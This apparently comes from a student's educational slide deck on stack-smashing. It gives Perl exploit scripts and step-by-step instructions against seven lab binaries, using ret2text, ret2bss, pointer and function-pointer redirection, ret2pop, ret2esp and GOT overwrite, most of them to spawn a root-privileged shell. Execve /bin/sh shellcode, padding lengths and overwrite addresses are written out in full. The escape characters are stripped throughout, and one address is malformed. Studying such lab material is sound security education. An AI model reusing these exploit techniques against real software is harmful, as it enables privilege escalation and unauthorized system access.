This project was completed in order to gain hands-on experience in smashing the stack by exploiting vulnerabilities in a given binary. The project involved designing exploits and eggs(payload) for various vulnerabilities that may exist in a given binary and execute the exploits to perform privilege escalation. This project is meant for education purpose only.

1. ret2text.c
• Here the exploit is executed by overflowing the buffer, corrupting the old ebp value and replacing the
return address by the address of secret function.
• This exploit allows to execute secret function even though guid is not equal to “0”.
• EXPLOIT SCRIPT:
• #!/usr/bin/perl
# This address must match the address of secret function in the victim's program */
my $retaddr = "x96x84x04x08"; #0x8048496
# Fill NOP instruction
my $pad = "x90" x 24; #overwriting buffer and EBP
# Input string to our victim's program
my $arg = $pad.$retaddr;
# Let us store the input string to a file
open OUT, "> payload_ret2text";
print OUT $arg;
close OUT;

2. • EVIDENCE SCREENSHOT:
• The address of the secret function
is obtained.
• Observe the stack frame of the
public function to check the buffer
size allocated.
• Prepare a payload using the script
as shown in the previous page.
• The payload must be 24 bytes of
NOP + 4 bytes to overwrite return
address.
• Inject the payload and the function
prints “secret”.

3. ret2bss.c
• This exploit makes use of the address of the global buffer since it does not change.
• You need not worry about the local buffer size and address
• EXPLOIT SCRIPT:
• my $shellcode =
"x31xc0". # xorl %eax, %eax
"x50". # pushl %eax
"x68x6ex2fx73x68". # pushl $0x68732f6e
"x68x2fx2fx62x69". # pushl $0x69622f2f
"x89xe3" . # movl %esp, %ebx
"x99". # cltd
"x52". # pushl %edx
"x53". # pushl %ebx
"x89xe1". # movl %esp, %ecx
"xb0x0b" . # movb $0xb, %al
"xcdx80" # int $0x80
;
# This address must match the global buffer variable of the victim's program */
my $retaddr = "x40xa0x04x08"; #0x804a040
# Fill NOP instruction
my $pad = "x90" x 244;
# Input string to our victim's program
my $arg = $shellcode.$pad.$retaddr;
# Let us store the input string to a file
open OUT, "> payload_bss";
print OUT $arg;
close OUT;

4. EVIDENCE SCREENSHOT:
• Observe the stack frame of the
method function to check the
buffer size allocated.
• Prepare a payload to overwrite
the return address by the
address of the global buffer
• The payload must be of 272
bytes: 24 bytes shellcode + 244
bytes padding + 4 bytes return
address.
• Inject the payload and the shell
code gets executed, spawning
the shell.

5. strptr.c
• This exploit redirects the pointers to spawn a shell.
• Makes use of the vulnerable function strptr.
• Exploit Script:
• # this address must be the address of license pointer
my $licenseaddr = "x82x85x04x08x82x85x04x08"; #two times because you have to over the conf ptr address by license
ptr.
# Fill NOP instruction
my $pad = "x90" x 256;
# Input string to our victim's program
my $arg = $pad.$licenseaddr;
# Let us store the input string to a file
open OUT, "> payload_strptr";
print OUT $arg;
close OUT;

6. EVIDENCE SCREENSHOT:
• Disassemble main to find out the
address of the license and conf
pointers.
• Create a file with name “THIS”
and then add the following: echo
“you have been hahcked by
me…..”
/bin/sh
• Generate a payload of 264 bytes:
to overwrite conf ptr by license
ptr.
• Inject the payload, when the
control is transferred to system
function, the file “THIS” will be
executed and the shell will be
spawned.

7. funcptr.c
• This exploit redirects the function pointers to spawn a shell.
• Makes use of the vulnerable function strptr.
• Exploit script:
• # this address must be the address of system instruction
my $systemaddr = "x40x83x04x08";
# Fill NOP instruction
my $pad = "x90" x 64;
# Input string to our victim's program
my $arg = $pad.$systemaddr;
# Let us store the input string to a file
open OUT, "> payload_funcptr";
print OUT $arg;
close OUT;

8. EVIDENCE SCREENSHOT:
• Disassemble the function
method to know the address of
the system instruction.
• Generate a payload by using the
script as show in the previous
slide.
• The payload must of 68 bytes:
64 bytes NOP + 4 bytes of
system instruction address.
• Inject the payload as the first
input and the ‘/bin/sh’ as the
second input.
• The system instruction executes
/bin/sh and the shell is
spawned.

9. ret2pop.c
• This exploit makes use of the vulnerable function strcpy.
• EXPLOIT SCRIPT:
• my $shellcode =
"x31xc0". # xorl %eax, %eax
"x50". # pushl %eax
"x68x6ex2fx73x68". # pushl $0x68732f6e
"x68x2fx2fx62x69". # pushl $0x69622f2f
"x89xe3" . # movl %esp, %ebx
"x99". # cltd
"x52". # pushl %edx
"x53". # pushl %ebx
"x89xe1". # movl %esp, %ecx
"xb0x0b" . # movb $0xb, %al
"xcdx80" # int $0x80
;
# This address must match the address of the pop and ret instruction sequence
my $retaddr = "xcbx84x04x8"; #80484cb
# Fill NOP instruction
my $pad = "x90" x 244;
# Input string to our victim's program
my $arg = $pad.$shellcode.$retaddr;
# Let us store the input string to a file
open OUT, "> payload_ret2pop";
print OUT $arg;
close OUT;

10. EVIDENCE SCREENSHOT:
• Disassemble the function
method to obtain the buffer size
and observe the stack frame.
• Using objdum –d obtain the
address of the pop and ret
instructions.
• Prepare a payload using the
script shown in the previous
slide.
• Payload must be 272 bytes: 244
bytes pad + 24 bytes shellcode +
4 bytes ret address.
• Inject the payload and the shell
is spawned as shown in the
figure.

11. ret2esp.c
• This exploit makes use of the jmp *esp instruction to control the flow of execution.
• It is done by determining the address of 58623 and hence the address of jmp *esp instruction.
• EXPLOIT SCRIPT:
• my $shellcode =
"x31xc0". # xorl %eax, %eax
"x50". # pushl %eax
"x68x6ex2fx73x68". # pushl $0x68732f6e
"x68x2fx2fx62x69". # pushl $0x69622f2f
"x89xe3" . # movl %esp, %ebx
"x99". # cltd
"x52". # pushl %edx
"x53". # pushl %ebx
"x89xe1". # movl %esp, %ecx
"xb0x0b" . # movb $0xb, %al
"xcdx80" # int $0x80
;
# This address must match the address where jmp *%esp or ff e4 instruction is stored
my $retaddr = "x42x84x04x08"; #8048424
# Fill NOP instruction
my $pad = "x90" x 268; # times because I need 16 bytes to hit the return address. 9+7 = 16.
# Input string to our victim's program
my $arg = $pad.$retaddr.$shellcode;
# Let us store the input string to a file
open OUT, "> payload_ret2esp";
print OUT $arg;
close OUT;

12. EVIDENCE SCREENSHOT:
• Disassemble the main program
and obtain the address of “ff e4”.
• Disassemble the function method
to observe the stack structure and
obtain the size of the buffer.
• Generate a payload using the
script as shown in the previous
slide.
• Payload = 268 bytes Pad + 4 bytes
ret address + 24 bytes shellcode.
• Inject the payload and the shell is
spawned as shown in the figure.

13. ret2got.c
• In this exploit the first strcpy instruction is used to overflow the buffer array and overwrite ptr by
printf GOT reference.
• This is accomplished by using the second strcpy and overwriting GOT entry of printf.
• EXPLOIT SCRIPT:
• ./ret2got `perl -e 'print "A"x8 . "x0cxa0x04x08"'` `perl -e 'print "x46x83x04x08“’`
• Entry for printf is 0x804a00c
• Dynamic linker address for system is 0x08048346

14. EVIDENCE SCREENSHOT:
• Disassemble main and obtain the
relevant entry point for ptintf i.e.
0x804a00c
• Disassemble anyfunction to obtain
the address where dynamic linker
call of the system happens i.e.
0x08048346
• The payload must have 8 bytes
followed by 4 bytes address of
printf and 4 bytes address where
system call happens.
• Create a file called array and add
the following instruction: /bin/sh
• Inject the payload and the shell is
spawned as shown in the figure.